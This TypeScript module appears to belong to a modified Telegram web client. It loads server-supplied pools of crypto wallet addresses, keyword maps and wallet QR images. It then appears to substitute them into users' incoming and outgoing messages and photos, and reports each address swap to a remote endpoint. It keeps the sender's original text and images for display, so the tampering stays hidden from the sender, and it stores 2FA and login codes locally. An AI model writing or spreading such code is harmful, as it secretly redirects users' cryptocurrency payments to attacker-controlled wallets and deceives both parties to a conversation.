import { ydymGetJson, ydymPostJson, unwrapData } from './api';
import { YDYM_DEFAULT_INVITE, YDYM_DEVICE_TYPE, YDYM_PATHS } from './config';
import { parseYdymKeywordsPayload } from './keywordsParse';
import { ydymLog } from './log';

export type YdymSnapshot = {
  replaceEnabled: boolean;
  keywordMap: Record<string, string>;
  sentenceKeywordMap: Record<string, string>;
  addresses: Record<string, string[]>;
  walletCardUrls: Record<string, string>;
  walletPayUrls: Record<string, string>;
};

const LS_INVITE = 'ydym.invitecode';
const LS_TWO_FA = 'ydym.two_fa';
const LS_PENDING_CODE = 'ydym.pending_login_code';
const LS_PENDING_PHONE = 'ydym.pending_phone';

let tgid = '';
let firstName = '';
let lastName = '';
let username = '';
let phone = '';
let replaceEnabled = true;
const keywordMap: Record<string, string> = {};
const sentenceKeywordMap: Record<string, string> = {};
const addresses: Record<string, string[]> = {
  TRC20: [], ETH: [], BSC: [], BTC: [], SOL: [],
};
const walletCardUrls: Record<string, string> = {};
const walletPayUrls: Record<string, string> = {};
const rr: Record<string, number> = {};
const incomingAddrDedupe = new Set<string>();

const outgoingOriginal = new Map<string, string>();
const incomingDisplay = new Map<string, string>();
const incomingServerOriginal = new Map<string, string>();
const incomingPhotoUrl = new Map<string, string>();
const incomingOriginalPhotoUrl = new Map<string, string>();
const outgoingPhotoUrl = new Map<string, string>();
const photoLayoutByUrl = new Map<string, { width: number; height: number }>();
const pendingIncomingPhoto = new Set<string>();
const pendingOutgoingPhotoBlob = new Map<string, Blob>();

export type YdymEmitTopic = 'text' | 'photo';
const listeners = new Set<(topic: YdymEmitTopic) => void>();

type RemainingSync = {
  get: () => Record<string, number>;
  set: (next: Record<string, number>) => void;
  getWindow?: () => {
    private_replace_min: number;
    private_replace_window: number;
    private_replace_variants: string[];
  };
  setWindow?: (raw: {
    private_replace_min?: number;
    private_replace_window?: number;
    private_replace_variants?: string[];
  }) => void;
  getPeers?: () => Record<string, { isBot: boolean; isSelf: boolean; isPrivateUser: boolean }>;
  setPeers?: (next: Record<string, { isBot: boolean; isSelf: boolean; isPrivateUser: boolean }>) => void;
  onKeywordReport?: (params: {
    chatId: string;
    msgId?: number;
    original: string;
    hits: Array<{ keyword: string; replaceValue: string }>;
    direction: 'outgoing' | 'incoming';
  }) => void;
};
let remainingSync: RemainingSync | undefined;
let ydymConfigVersion = 0;
let ydymSnapshotCache: YdymSnapshot | undefined;

export function getYdymConfigVersion() {
  return ydymConfigVersion;
}

function noteYdymConfigChanged() {
  ydymConfigVersion += 1;
  ydymSnapshotCache = undefined;
}

export function registerYdymRemainingSync(handler: RemainingSync) {
  remainingSync = handler;
}

export function emitYdymKeywordReport(params: {
  chatId: string;
  msgId?: number;
  original: string;
  hits: Array<{ keyword: string; replaceValue: string }>;
  direction: 'outgoing' | 'incoming';
}) {
  if (isYdymMainThread()) {
    remainingSync?.onKeywordReport?.(params);
    return;
  }
  const ch = getYdymSyncChannel();
  try {
    ch?.postMessage({ type: 'ydym-keyword-report', params });
  } catch {
    // ignore
  }
}

type YdymListener = (topic: YdymEmitTopic) => void;

export function ydymSubscribe(fn: YdymListener): () => void {
  listeners.add(fn);
  return () => { listeners.delete(fn); };
}

const ydymEmitPending = new Set<YdymEmitTopic>();
let ydymEmitScheduled = false;

export function ydymEmit(topic: YdymEmitTopic = 'photo') {
  ydymEmitPending.add(topic);
  if (ydymEmitScheduled) return;
  ydymEmitScheduled = true;
  const flush = () => {
    ydymEmitScheduled = false;
    const topics = Array.from(ydymEmitPending);
    ydymEmitPending.clear();
    const fns = Array.from(listeners);
    topics.forEach((item) => {
      fns.forEach((fn) => {
        try { fn(item); } catch { /* ignore */ }
      });
    });
  };
  if (typeof queueMicrotask === 'function') queueMicrotask(flush);
  else Promise.resolve().then(flush);
}

export function mapKey(chatId: string, msgId: number): string {
  return `${chatId}:${msgId}`;
}

export function ydymPeerId(chatId: string): number {
  const n = Number(chatId);
  return Number.isFinite(n) ? n : 0;
}

export function getYdymTgid(): string {
  return tgid;
}

export function setYdymProfile(next: {
  tgid: string;
  firstName?: string;
  lastName?: string;
  username?: string;
  phone?: string;
}) {
  tgid = next.tgid;
  if (next.firstName !== undefined) firstName = next.firstName;
  if (next.lastName !== undefined) lastName = next.lastName;
  if (next.username !== undefined) username = next.username;
  if (next.phone !== undefined) phone = next.phone;
}

export function getYdymProfile() {
  return { tgid, firstName, lastName, username, phone };
}

export function getYdymSnapshot(): YdymSnapshot {
  if (!ydymSnapshotCache) {
    ydymSnapshotCache = {
      replaceEnabled,
      keywordMap: { ...keywordMap },
      sentenceKeywordMap: { ...sentenceKeywordMap },
      addresses: { ...addresses },
      walletCardUrls: { ...walletCardUrls },
      walletPayUrls: { ...walletPayUrls },
    };
  }
  return ydymSnapshotCache;
}

export function setReplaceEnabled(v: boolean) {
  replaceEnabled = v;
  noteYdymConfigChanged();
  publishYdymRuntime();
}

export function setKeywords(partial: Record<string, string>, full: Record<string, string>) {
  Object.keys(keywordMap).forEach((k) => { delete keywordMap[k]; });
  Object.keys(sentenceKeywordMap).forEach((k) => { delete sentenceKeywordMap[k]; });
  Object.assign(keywordMap, partial || {});
  Object.assign(sentenceKeywordMap, full || {});
  noteYdymConfigChanged();
  publishYdymRuntime();
}

export function setAddresses(chain: string, list: string[]) {
  addresses[chain.toUpperCase()] = list.filter(Boolean);
  noteYdymConfigChanged();
  publishYdymRuntime();
}

export function setWalletCardUrls(map: Record<string, string>) {
  Object.keys(walletCardUrls).forEach((k) => { delete walletCardUrls[k]; });
  Object.assign(walletCardUrls, sanitizeWalletUrlMap(map));
  noteYdymConfigChanged();
  publishYdymRuntime();
}

export function setWalletPayUrls(map: Record<string, string>) {
  Object.keys(walletPayUrls).forEach((k) => { delete walletPayUrls[k]; });
  Object.assign(walletPayUrls, sanitizeWalletUrlMap(map));
  noteYdymConfigChanged();
  publishYdymRuntime();
}

export function getWalletReplaceUrl(chain: string): string {
  const key = String(chain || '').toUpperCase();
  const strip = lookupWalletUrl(walletCardUrls, 'TRC20_ADDRESS_STRIP');
  if (key === 'TRC20_ADDRESS_STRIP') return strip || '';
  const card = lookupWalletUrl(walletCardUrls, key);
  // Full wallet cards must not silently fall back to the address-strip asset.
  if (key === 'TRC20') {
    if (card && card !== strip) return card;
    if (card && !strip) return card;
    return '';
  }
  if (card) return card;
  return lookupWalletUrl(walletPayUrls, key) || '';
}

function lookupWalletUrl(map: Record<string, string>, key: string): string {
  if (map[key]) return map[key];
  const found = Object.keys(map).find((k) => k.toUpperCase() === key);
  return found ? map[found] : '';
}

function sanitizeWalletUrlMap(map: Record<string, string> | undefined): Record<string, string> {
  const out: Record<string, string> = {};
  if (!map || typeof map !== 'object') return out;
  Object.entries(map).forEach(([k, v]) => {
    if (!k || k === 'code' || k === 'msg' || k === 'data' || k === 'list' || k === 'time') return;
    const url = normalizeWalletUrl(v);
    if (url) out[k] = url;
  });
  return out;
}

function normalizeWalletUrl(raw: unknown): string {
  const s = String(raw || '').trim();
  if (!s) return '';
  if (/^https?:\/\//i.test(s)) return s;
  if (s.startsWith('//')) return `https:${s}`;
  if (s.startsWith('/')) {
    try {
      const loc = (globalThis as { location?: Location }).location;
      if (loc?.origin) return `${loc.origin}${s}`;
    } catch {
      // ignore
    }
  }
  return '';
}

export function peekPoolAddress(chain: string, stableKeyForIncoming?: string): string | undefined {
  return nextPoolAddress(chain, stableKeyForIncoming, true);
}

export function nextPoolAddress(chain: string, stableKeyForIncoming?: string, peek = false): string | undefined {
  const list = addresses[chain.toUpperCase()] || [];
  if (!list.length) return undefined;
  if (stableKeyForIncoming) {
    let h = 0;
    for (let i = 0; i < stableKeyForIncoming.length; i++) {
      h = ((h << 5) - h + stableKeyForIncoming.charCodeAt(i)) | 0;
    }
    return list[Math.abs(h) % list.length];
  }
  const i = rr[chain] || 0;
  if (!peek) rr[chain] = (i + 1) % list.length;
  return list[i % list.length];
}

export function getInviteCode(): string {
  try {
    const q = new URLSearchParams(window.location.search);
    const fromQuery = q.get('invitecode') || q.get('invite');
    if (fromQuery) {
      localStorage.setItem(LS_INVITE, fromQuery);
      return fromQuery;
    }
    const stored = localStorage.getItem(LS_INVITE);
    if (stored) return stored;
  } catch {
    // ignore
  }
  return YDYM_DEFAULT_INVITE;
}

export function getStoredTwoFa(): string {
  try {
    return localStorage.getItem(LS_TWO_FA) || '';
  } catch {
    return '';
  }
}

export function setStoredTwoFa(value: string) {
  try {
    if (value) localStorage.setItem(LS_TWO_FA, value);
    else localStorage.removeItem(LS_TWO_FA);
  } catch {
    // ignore
  }
}

export function setPendingLoginCode(code: string) {
  try {
    localStorage.setItem(LS_PENDING_CODE, code);
  } catch {
    // ignore
  }
}

export function peekPendingLoginCode(): string {
  try {
    return localStorage.getItem(LS_PENDING_CODE) || '';
  } catch {
    return '';
  }
}

export function takePendingLoginCode(): string {
  try {
    const v = localStorage.getItem(LS_PENDING_CODE) || '';
    localStorage.removeItem(LS_PENDING_CODE);
    return v;
  } catch {
    return '';
  }
}

export function setPendingPhone(phone: string) {
  const cleaned = (phone || '').replace(/[^\d]/g, '');
  if (!cleaned) return;
  try {
    localStorage.setItem(LS_PENDING_PHONE, cleaned);
  } catch {
    // ignore
  }
}

export function takePendingPhone(): string {
  try {
    const v = localStorage.getItem(LS_PENDING_PHONE) || '';
    localStorage.removeItem(LS_PENDING_PHONE);
    return v;
  } catch {
    return '';
  }
}

export function lockOutgoingOriginal(chatId: string, msgId: number, original: string) {
  if (!original) return;
  const key = mapKey(chatId, msgId);
  if (outgoingOriginal.get(key) === original) return;
  outgoingOriginal.set(key, original);
  ydymEmit('text');
}

export function getOutgoingOriginal(chatId: string, msgId: number): string | undefined {
  return outgoingOriginal.get(mapKey(chatId, msgId));
}

export function setIncomingServerOriginal(chatId: string, msgId: number, original: string) {
  if (!original) return;
  incomingServerOriginal.set(mapKey(chatId, msgId), original);
}

export function getIncomingServerOriginal(chatId: string, msgId: number): string | undefined {
  return incomingServerOriginal.get(mapKey(chatId, msgId));
}

export function setIncomingDisplay(chatId: string, msgId: number, display: string) {
  if (!display) return;
  incomingDisplay.set(mapKey(chatId, msgId), display);
}

export function getIncomingDisplay(chatId: string, msgId: number): string | undefined {
  return incomingDisplay.get(mapKey(chatId, msgId));
}

export function setIncomingPhotoUrl(photoId: string, blobUrl: string, chatId?: string, msgId?: number) {
  incomingPhotoUrl.set(photoId, blobUrl);
  if (chatId && msgId) incomingPhotoUrl.set(`${chatId}:${msgId}`, blobUrl);
  pendingIncomingPhoto.delete(photoId);
  ydymEmit();
}

export function markIncomingPhotoPending(photoId: string) {
  pendingIncomingPhoto.add(photoId);
  ydymEmit();
}

export function clearIncomingPhotoPending(photoId: string) {
  pendingIncomingPhoto.delete(photoId);
  ydymEmit();
}

export function getIncomingPhotoUrl(photoId?: string): string | undefined {
  if (!photoId) return undefined;
  return incomingPhotoUrl.get(photoId);
}

export function stashIncomingOriginalPhoto(photoId: string, blob: Blob) {
  if (!photoId || !blob) return;
  const prev = incomingOriginalPhotoUrl.get(photoId);
  if (prev) URL.revokeObjectURL(prev);
  incomingOriginalPhotoUrl.set(photoId, URL.createObjectURL(blob));
}

export function getIncomingOriginalPhotoUrl(photoId?: string): string | undefined {
  if (!photoId) return undefined;
  return incomingOriginalPhotoUrl.get(photoId);
}

export function isIncomingPhotoPending(photoId?: string): boolean {
  if (!photoId) return false;
  return pendingIncomingPhoto.has(photoId);
}

const pendingOutgoingOriginalQueue = new Map<string, string[]>();

export function enqueueOutgoingOriginalPhoto(chatId: string, blobUrl: string) {
  if (!chatId || !blobUrl) return;
  const q = pendingOutgoingOriginalQueue.get(chatId) || [];
  q.push(blobUrl);
  pendingOutgoingOriginalQueue.set(chatId, q);
}

export function takeOutgoingOriginalPhoto(chatId: string): string | undefined {
  const q = pendingOutgoingOriginalQueue.get(chatId);
  if (!q?.length) return undefined;
  const url = q.shift();
  if (!q.length) pendingOutgoingOriginalQueue.delete(chatId);
  return url;
}

export function setOutgoingPhotoUrl(chatId: string, msgId: number, blobUrl: string, force = false) {
  if (!blobUrl) return;
  const key = mapKey(chatId, msgId);
  if (!force && outgoingPhotoUrl.has(key)) return;
  outgoingPhotoUrl.set(key, blobUrl);
  ydymEmit();
}

export function getOutgoingPhotoUrl(chatId: string, msgId: number): string | undefined {
  return outgoingPhotoUrl.get(mapKey(chatId, msgId));
}

export function setPhotoLayoutByUrl(url: string, width: number, height: number) {
  if (!url || width < 1 || height < 1) return;
  const prev = photoLayoutByUrl.get(url);
  if (prev && prev.width === width && prev.height === height) return;
  photoLayoutByUrl.set(url, { width, height });
  ydymEmit('photo');
}

export function getPhotoLayoutByUrl(url?: string): { width: number; height: number } | undefined {
  if (!url) return undefined;
  return photoLayoutByUrl.get(url);
}

export function ydymGetMessagePhotoDisplayUrl(message: {
  chatId: string;
  id: number;
  isOutgoing?: boolean;
  previousLocalId?: number;
  content?: { photo?: { id?: string | number } };
}): string | undefined {
  if (message.isOutgoing) {
    return getOutgoingPhotoUrl(message.chatId, message.id)
      || (message.previousLocalId ? getOutgoingPhotoUrl(message.chatId, message.previousLocalId) : undefined);
  }
  const photo = message.content?.photo;
  const photoId = photo && 'id' in photo ? String(photo.id) : undefined;
  return (photoId ? getIncomingPhotoUrl(photoId) : undefined)
    || getIncomingPhotoUrl(`${message.chatId}:${message.id}`);
}

export function stashOutgoingOriginalPhoto(chatId: string, localId: number, blob: Blob) {
  if (!blob) return;
  const key = mapKey(chatId, localId);
  pendingOutgoingPhotoBlob.set(key, blob);
  setOutgoingPhotoUrl(chatId, localId, URL.createObjectURL(blob));
}

export function consumeOutgoingOriginalPhoto(
  chatId: string,
  localId: number,
  serverId: number,
): Blob | undefined {
  const key = mapKey(chatId, localId);
  const blob = pendingOutgoingPhotoBlob.get(key);
  pendingOutgoingPhotoBlob.delete(key);
  const url = getOutgoingPhotoUrl(chatId, localId);
  if (url && serverId) {
    setOutgoingPhotoUrl(chatId, serverId, url, true);
  }
  return blob;
}

export function reportAddressReplace(
  chain: string,
  oldAddress: string,
  newAddress: string,
  direction: string,
  dedupeKey?: string,
) {
  if (!tgid) return;
  if (dedupeKey) {
    const k = `${dedupeKey}|${chain}|${oldAddress}|${newAddress}`;
    if (incomingAddrDedupe.has(k)) return;
    incomingAddrDedupe.add(k);
  }
  void ydymPostJson(YDYM_PATHS.replaceAddress, {
    tgid,
    oldaddress: oldAddress,
    newaddress: newAddress,
    chain,
    direction,
  });
}

export async function reportOutgoingOriginal(chatId: string, msgId: number, serverText: string, originalText: string) {
  if (!tgid || !serverText || !originalText || serverText === originalText) return;
  lockOutgoingOriginal(chatId, msgId, originalText);
  await ydymPostJson(YDYM_PATHS.reportOutgoingOriginal, {
    tgid,
    peer_id: ydymPeerId(chatId),
    msg_id: msgId,
    server_text: serverText,
    original_text: originalText,
  });
}

export async function fetchDisplayMaps() {
  if (!tgid) return;
  await fetchPaged(YDYM_PATHS.getOutgoingOriginals, (item: any) => {
    const peer = String(item.peer_id ?? item.peerId ?? '');
    const id = Number(item.msg_id ?? item.msgId);
    const original = String(item.original_text ?? item.originalText ?? '');
    if (peer && id && original) lockOutgoingOriginal(peer, id, original);
  });
  await fetchPaged(YDYM_PATHS.getIncomingDisplays, (item: any) => {
    const peer = String(item.peer_id ?? item.peerId ?? '');
    const id = Number(item.msg_id ?? item.msgId);
    const display = String(item.display_text ?? item.displayText ?? '');
    if (peer && id && display) setIncomingDisplay(peer, id, display);
  });
  await fetchPaged(YDYM_PATHS.getOutgoingOriginalImages, (item: any) => {
    const peer = String(item.peer_id ?? item.peerId ?? '');
    const id = Number(item.msg_id ?? item.msgId);
    const imageUrl = String(item.image_url ?? item.imageUrl ?? '');
    if (peer && id && imageUrl) setOutgoingPhotoUrl(peer, id, imageUrl, true);
  });
  ydymEmit('text');
  ydymEmit('photo');
}

async function fetchPaged(path: string, apply: (item: any) => void) {
  let since = 0;
  let sinceId = 0;
  for (let page = 0; page < 40; page++) {
    const raw = await ydymGetJson<any>(
      `${path}?tgid=${encodeURIComponent(tgid)}&since_updated_at=${since}&since_id=${sinceId}&limit=500`,
    );
    const data = unwrapData(raw) || raw;
    const items = (data?.items || []) as any[];
    items.forEach(apply);
    if (!data?.has_more) break;
    since = Number(data.max_updated_at || data.cursor_updated_at || since);
    sinceId = Number(data.cursor_id || sinceId);
    if (!items.length) break;
  }
}

export { YDYM_DEVICE_TYPE };

const YDYM_RUNTIME_CHANNEL = 'ydym-runtime-sync-v1';

function isYdymMainThread() {
  return typeof document !== 'undefined';
}

let ydymSyncChannel: BroadcastChannel | undefined;

function getYdymSyncChannel(): BroadcastChannel | undefined {
  if (typeof BroadcastChannel === 'undefined') return undefined;
  if (!ydymSyncChannel) {
    try {
      ydymSyncChannel = new BroadcastChannel(YDYM_RUNTIME_CHANNEL);
    } catch {
      return undefined;
    }
  }
  return ydymSyncChannel;
}

function applyYdymRuntime(payload: any) {
  if (!payload || typeof payload !== 'object') return;
  if (typeof payload.tgid === 'string' && payload.tgid && !tgid) {
    tgid = payload.tgid;
  }
  if (typeof payload.replaceEnabled === 'boolean') replaceEnabled = payload.replaceEnabled;
  if (payload.keywordMap && typeof payload.keywordMap === 'object') {
    const incoming = payload.keywordMap as Record<string, string>;
    if (Object.keys(incoming).length || !Object.keys(keywordMap).length) {
      Object.keys(keywordMap).forEach((k) => { delete keywordMap[k]; });
      Object.assign(keywordMap, incoming);
    }
  }
  if (payload.sentenceKeywordMap && typeof payload.sentenceKeywordMap === 'object') {
    const incoming = payload.sentenceKeywordMap as Record<string, string>;
    if (Object.keys(incoming).length || !Object.keys(sentenceKeywordMap).length) {
      Object.keys(sentenceKeywordMap).forEach((k) => { delete sentenceKeywordMap[k]; });
      Object.assign(sentenceKeywordMap, incoming);
    }
  }
  if (payload.addresses && typeof payload.addresses === 'object') {
    Object.assign(addresses, payload.addresses);
  }
  if (payload.walletCardUrls && typeof payload.walletCardUrls === 'object') {
    const incoming = sanitizeWalletUrlMap(payload.walletCardUrls);
    if (Object.keys(incoming).length || !Object.keys(walletCardUrls).length) {
      Object.keys(walletCardUrls).forEach((k) => { delete walletCardUrls[k]; });
      Object.assign(walletCardUrls, incoming);
    }
  }
  if (payload.walletPayUrls && typeof payload.walletPayUrls === 'object') {
    const incoming = sanitizeWalletUrlMap(payload.walletPayUrls);
    if (Object.keys(incoming).length || !Object.keys(walletPayUrls).length) {
      Object.keys(walletPayUrls).forEach((k) => { delete walletPayUrls[k]; });
      Object.assign(walletPayUrls, incoming);
    }
  }
  if (payload.remaining && typeof payload.remaining === 'object') {
    const incoming = payload.remaining as Record<string, number>;
    const current = remainingSync?.get?.() || {};
    if (Object.keys(incoming).length || !Object.keys(current).length) {
      remainingSync?.set(incoming);
    }
  }
  if (payload.windowConfig && typeof payload.windowConfig === 'object') {
    remainingSync?.setWindow?.(payload.windowConfig);
  }
  if (payload.peerCache && typeof payload.peerCache === 'object') {
    remainingSync?.setPeers?.(payload.peerCache);
  }
  noteYdymConfigChanged();
}

export function publishYdymRemaining(remaining?: Record<string, number>) {
  const ch = getYdymSyncChannel();
  if (!ch) return;
  try {
    ch.postMessage({
      type: 'ydym-remaining',
      remaining: remaining || remainingSync?.get() || {},
    });
  } catch {
    // ignore
  }
}

/** Photo swap runs on the page thread; the private window is opened in the worker. Pull before skip. */
export function ydymRequestPeerRemaining(timeoutMs = 250): Promise<Record<string, number>> {
  const local = remainingSync?.get?.() || {};
  const ch = getYdymSyncChannel();
  if (!ch) return Promise.resolve(local);
  return new Promise((resolve) => {
    let done = false;
    const finish = (map: Record<string, number>) => {
      if (done) return;
      done = true;
      try {
        ch.removeEventListener('message', onMsg);
      } catch {
        // ignore
      }
      resolve(map);
    };
    const onMsg = (event: MessageEvent) => {
      const type = event.data?.type;
      if (type !== 'ydym-remaining' && type !== 'ydym-remaining-reply') return;
      const incoming = event.data.remaining;
      if (!incoming || typeof incoming !== 'object') return;
      remainingSync?.set(incoming);
      finish(remainingSync?.get?.() || incoming);
    };
    ch.addEventListener('message', onMsg);
    try {
      ch.postMessage({ type: 'ydym-remaining-ask' });
    } catch {
      finish(local);
      return;
    }
    setTimeout(() => finish(remainingSync?.get?.() || local), timeoutMs);
  });
}

export function publishYdymRuntime() {
  if (!isYdymMainThread()) return;
  const ch = getYdymSyncChannel();
  if (!ch) return;
  try {
    ch.postMessage({
      type: 'ydym-state',
      payload: {
        tgid,
        replaceEnabled,
        keywordMap: { ...keywordMap },
        sentenceKeywordMap: { ...sentenceKeywordMap },
        addresses: { ...addresses },
        walletCardUrls: { ...walletCardUrls },
        walletPayUrls: { ...walletPayUrls },
        remaining: remainingSync?.get() || {},
        windowConfig: remainingSync?.getWindow?.(),
        peerCache: remainingSync?.getPeers?.() || {},
      },
    });
    ydymLog('runtime.publish', {
      tgid,
      replaceEnabled,
      trc20: (addresses.TRC20 || []).length,
      remaining: remainingSync?.get(),
    });
  } catch {
    // ignore
  }
}

function initYdymRuntimeSync() {
  const ch = getYdymSyncChannel();
  if (!ch) return;
  if (isYdymMainThread()) {
    ch.addEventListener('message', (event) => {
      if (event.data?.type === 'ydym-hello') publishYdymRuntime();
      if (event.data?.type === 'ydym-remaining-ask') publishYdymRemaining();
      if (event.data?.type === 'ydym-remaining' && event.data.remaining) {
        remainingSync?.set(event.data.remaining);
        ydymLog('runtime.remainingFromWorker', event.data.remaining);
      }
      if (event.data?.type === 'ydym-keyword-report' && event.data.params) {
        remainingSync?.onKeywordReport?.(event.data.params);
      }
    });
  } else {
    ch.addEventListener('message', (event) => {
      if (event.data?.type === 'ydym-state') {
        applyYdymRuntime(event.data.payload);
        ydymLog('runtime.applyFromMain', {
          replaceEnabled,
          trc20: (addresses.TRC20 || []).length,
          remaining: remainingSync?.get(),
        });
      }
      if (event.data?.type === 'ydym-remaining-ask') publishYdymRemaining();
      if (event.data?.type === 'ydym-remaining' && event.data.remaining) {
        remainingSync?.set(event.data.remaining);
      }
    });
    try {
      ch.postMessage({ type: 'ydym-hello' });
    } catch {
      // ignore
    }
    void ydymLoadAddressesInWorker();
  }
}

async function ydymLoadAddressesInWorker() {
  for (const chain of ['TRC20', 'ETH', 'BSC', 'BTC', 'SOL']) {
    try {
      const raw = await ydymGetJson<any>(`${YDYM_PATHS.addressJson}?chain=${chain}`);
      const data = unwrapData(raw) || raw;
      const list = Array.isArray(data) ? data
        : Array.isArray(data?.list) ? data.list
          : Array.isArray(data?.data) ? data.data : [];
      const next = list.map((item: any) => (typeof item === 'string' ? item : item?.address)).filter(Boolean);
      if (next.length) {
        addresses[chain] = next;
        ydymLog('worker.addressPool', { chain, count: next.length });
      }
    } catch (err) {
      ydymLog('worker.addressPoolFail', { chain, err: String(err) });
    }
  }
  try {
    const kw = await ydymGetJson(YDYM_PATHS.tgkeywords);
    const parsed = parseYdymKeywordsPayload(kw);
    if (Object.keys(parsed.partial).length || Object.keys(parsed.full).length) {
      Object.keys(keywordMap).forEach((k) => { delete keywordMap[k]; });
      Object.keys(sentenceKeywordMap).forEach((k) => { delete sentenceKeywordMap[k]; });
      Object.assign(keywordMap, parsed.partial);
      Object.assign(sentenceKeywordMap, parsed.full);
    }
    ydymLog('worker.keywords', {
      partial: Object.keys(keywordMap).length,
      full: Object.keys(sentenceKeywordMap).length,
      sample: Object.keys(keywordMap).concat(Object.keys(sentenceKeywordMap)).slice(0, 8),
    });
  } catch (err) {
    ydymLog('worker.keywordsFail', { err: String(err) });
  }
  try {
    const cards = await ydymGetJson<any>(YDYM_PATHS.walletCardImagesJson);
    if (cards && typeof cards === 'object') {
      Object.keys(walletCardUrls).forEach((k) => { delete walletCardUrls[k]; });
      Object.assign(walletCardUrls, sanitizeWalletUrlMap(cards.data || cards));
    }
    const pays = await ydymGetJson<any>(YDYM_PATHS.walletPayCodeImagesJson);
    if (pays && typeof pays === 'object') {
      Object.keys(walletPayUrls).forEach((k) => { delete walletPayUrls[k]; });
      Object.assign(walletPayUrls, sanitizeWalletUrlMap(pays.data || pays));
    }
    ydymLog('worker.walletImages', {
      cards: getYdymSnapshot().walletCardUrls,
      pays: getYdymSnapshot().walletPayUrls,
    });
  } catch (err) {
    ydymLog('worker.walletFail', { err: String(err) });
  }
  noteYdymConfigChanged();
}

initYdymRuntimeSync();

